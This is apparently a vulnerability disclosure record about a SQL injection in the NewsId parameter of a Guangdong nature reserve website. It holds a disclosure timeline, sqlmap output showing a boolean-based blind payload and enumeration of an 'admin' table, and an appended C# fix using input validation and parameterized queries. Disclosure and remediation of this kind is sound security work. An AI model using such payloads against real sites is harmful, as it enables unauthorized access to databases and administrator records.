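2015-10-21: Details reported to the vendor; awaiting vendor handling
2015-10-23: Vendor confirmed; details disclosed to the vendor only
2015-11-02: Details disclosed to core white hats and experts in related fields
2015-11-12: Details disclosed to regular white hats
2015-11-22: Details disclosed to intern white hats
2015-12-07: Details disclosed to the public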
SQL injection on a site of the Guangdong Provincial Forestry Bureau
The Guangdong Nature Reserve site has a SQL injection. http://**.**.**.**/NewsDetail.aspx?NewsId=20151013_170730
sqlmap identified the following injection points with a total of 161 HTTP(s) requests:
---
Parameter: NewsId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: NewsId=20151013_170730' AND 2620=2620 AND 'rxVf'='rxVf
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: NewsId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: NewsId=20151013_170730' AND 2620=2620 AND 'rxVf'='rxVf
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[1 table]
+-------+
| admin |
+-------+

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: NewsId (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: NewsId=20151013_170730' AND 2620=2620 AND 'rxVf'='rxVf
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
+-------+---------+
| Table | Entries |
+-------+---------+
| admin | 168     |
+-------+---------+
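Severity: High
Vulnerability Rank: 10
Confirmed: 2015-10-23 10:45
CNVD confirmed and reproduced the reported vulnerability and has passed it to CNCERT for forwarding to the corresponding branch center, which will follow up and coordinate remediation with the organization that manages the site.
None yet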
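The remediation for the finding above, as an added example that is not code from the affected site: the reported payload closes a string literal in `NewsId`, so the lookup should validate the id format and bind it as an OLE DB parameter. The names `NewsRepository`, `News`, `Title` and `Body` are hypothetical, and the id format is assumed from the URL in the report.

```csharp
using System;
using System.Data;
using System.Data.OleDb;
using System.Text.RegularExpressions;

public static class NewsRepository
{
    // Assumption: NewsId always has the shape seen in the report URL,
    // 20151013_170730 (8 digits, underscore, 6 digits).
    private static readonly Regex NewsIdPattern =
        new Regex(@"\A[0-9]{8}_[0-9]{6}\z", RegexOptions.CultureInvariant);

    // Typical vulnerable pattern, shown for contrast only (hypothetical):
    //   "SELECT Title, Body FROM News WHERE NewsId = '" + newsId + "'"
    // A quote inside newsId ends the literal, and the remainder is parsed as SQL.

    // Hardened lookup. Table and column names are hypothetical.
    public static DataTable GetNews(string connectionString, string newsId)
    {
        // Layer 1: reject anything that is not a well-formed id
        // before it gets anywhere near the database.
        if (newsId == null || !NewsIdPattern.IsMatch(newsId))
            throw new ArgumentException("Malformed NewsId.", "newsId");

        // Layer 2: bind the value as a parameter. OLE DB uses positional '?'
        // markers, so the value travels as data and never as statement text.
        const string sql = "SELECT Title, Body FROM News WHERE NewsId = ?";

        using (OleDbConnection conn = new OleDbConnection(connectionString))
        using (OleDbCommand cmd = new OleDbCommand(sql, conn))
        {
            // The parameter name is ignored by OLE DB; only the order matters.
            OleDbParameter p = cmd.Parameters.Add("@NewsId", OleDbType.VarWChar, 15);
            p.Value = newsId;

            DataTable result = new DataTable();
            using (OleDbDataAdapter adapter = new OleDbDataAdapter(cmd))
            {
                adapter.Fill(result); // Fill opens and closes the connection itself.
            }
            return result;
        }
    }
}
```

With this in place, the value from the sqlmap output fails the format check and raises `ArgumentException`; if the check were removed, the bound parameter would still compare it as a literal string that matches no row.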